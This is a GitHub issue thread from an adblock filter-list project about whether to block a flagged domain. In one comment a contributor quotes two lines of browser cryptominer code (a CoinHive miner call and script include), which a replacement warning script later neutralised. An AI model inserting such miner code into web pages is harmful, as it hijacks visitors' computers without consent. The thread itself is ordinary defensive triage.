search

DandelionSprout / adfilt

The place where I, DandelionSprout, store my web filter lists for countless topics, including my Nordic adblock list. As simple as that, really.
Other
1.38k stars 146 forks source link

Malware domain #190

Closed iam-py-test closed 3 years ago

iam-py-test commented 3 years ago

Which entry/entries are you submitting?

aahora.org$all

Which things do they block, hide, or unbreak?

Malware. See these for more information: https://www.virustotal.com/gui/url/c5e388bc7c4f32f038e1ffaf055368c55b197251a9969c746a5f5ed7852f4ec4/detection https://www.fortiguard.com/webfilter?q=aahora.org https://safeweb.norton.com/report/show?url=aahora.org https://www.urlvoid.com/scan/aahora.org/ https://quttera.com/detailed_report/aahora.org https://sitecheck.sucuri.net/results/aahora.org https://github.com/iam-py-test/my_filters_001/commit/b0b68fbd76522683cad733ee03f90d057e2b55eb https://quttera.com/detailed_report/coin-hive.com https://www.virustotal.com/gui/url/993da527c38d30523da34f9bcf14e3b3b82ef7ce0c1a90604fedcff7587c7ecc/detection https://www.virustotal.com/gui/domain/aahora.org/detection https://www.virustotal.com/gui/domain/www.aahora.org/detection https://www.virustotal.com/gui/url/9ff23b338f715e4c8ebeb2429c9145c3f433a9eb9d2a72fe3d62f3b80d133b27/detection https://www.scumware.org/search.php (Complete the captcha and enter aahora.org to get results; strangely does not allow report to be linked)

The response: https://github.com/iam-py-test/Badware-Reports-1/blob/main/malware_page_content/malware_web20aahora.org.txt

Which of my lists are you submitting it to?

Antimalware

Which adblocker(s) and version did you use when writing and testing the entries?

Other(s):

Adblocker version(s): uBlock Origin development build v1.35.3b7

Which filterlists did you use? Failing to tell this will temporarily close the report until it has been told.

(Optional) Which browser(s) and version did you use?

Edge Version 91.0.864.37

liamengland1 commented 3 years ago

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

iam-py-test commented 3 years ago

It looks like the official website of some sort of organization to me. Which part of the site is malicious? Is there a specific page?

https://www.facebook.com/fundacionahora/

I looked at the Facebook link and it looked official. The whole thing is in another language so I am not sure what it says. Maybe it got bought by someone else and is no longer malware, or is infected? @DandelionSprout what do you think?

Which part of the site is malicious? Is there a specific page?

The scans flagged the homepage as having malware but most reported the host as malware too

iam-py-test commented 3 years ago

Looking at the code, it seems like maybe it was flagged because of this:

var miner = new CoinHive.Anonymous('w9WpfXZJ9POkztDmNpey3zA1eq3I3Y2p', {throttle: 0.3});

Or this

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

iam-py-test commented 3 years ago

@llacb47 @DandelionSprout should I close this issue or do you think further investigation is needed?

iam-py-test commented 3 years ago

It looks like the CoinHive script at https://coinhive.com/lib/coinhive.min.js was replaced with another script:

// Credit to https://w3bits.com/javascript-modal/

let createModal = (modalContent) => {
  let modal = document.createElement('div'),
    modalStyle = document.createElement('style'),
    modalCSS = '.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; }  .js-modal-inner a { color: #000; text-decoration: underline; } .js-modal-close{ position: absolute; top: -10px; right: 0px; background-color: black; color: #eee; border-width: 0; font-size: 10px; height: 24px; width: 24px; border-radius: 100%; text-align: center; font-family: Arial; cursor: pointer;}',
    modalClose = '<button class="js-modal-close" id="js_modal_close">X</button>',
    theBody = document.getElementsByTagName('body')[0],
    theHead = document.getElementsByTagName('head')[0];

  // Add content and attributes to the modal
  modal.setAttribute('class', 'js-modal');
  modal.innerHTML = '<div class="js-modal-inner">' + modalContent + modalClose + '</div>';
  theBody.appendChild(modal);

  modalClose = document.querySelector('#js_modal_close');

  // Add the modal styles dynamically
  if(modalStyle.styleSheet){
    modalStyle.styleSheet.cssText = modalCSS;
  } else {
    modalStyle.appendChild(document.createTextNode(modalCSS));
  }
  theHead.appendChild(modalStyle);

  // Close the modal on button-click
  if(modalClose) {
    modalClose.addEventListener('click', function() {
      modal.remove();
      modalStyle.remove();
    });
  }
}

// Show it up when loading starts
window.addEventListener('load', function() {
  /* Remember to escape the characters to their respective valid HTML entities, for eg. ' will become \' */
  createModal('This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.');
});
iam-py-test commented 3 years ago

Closing issue

DandelionSprout commented 3 years ago

Fun fact: Microsoft Defender on my PC seemingly detects the scripts and script-lines above, as if my GitHub E-mail notifications with them are themselves CoinHive viruses. 😅

DandelionSprout commented 3 years ago

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

iam-py-test commented 3 years ago

The site seems to be quasi-safe after Troy Hunt was able to deactivate CoinHive on that site, seemingly: https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

As such, I at least presume that there's no immediate need to add aahora.org to my list.

Yes. I am sorry for the error; I did not realize that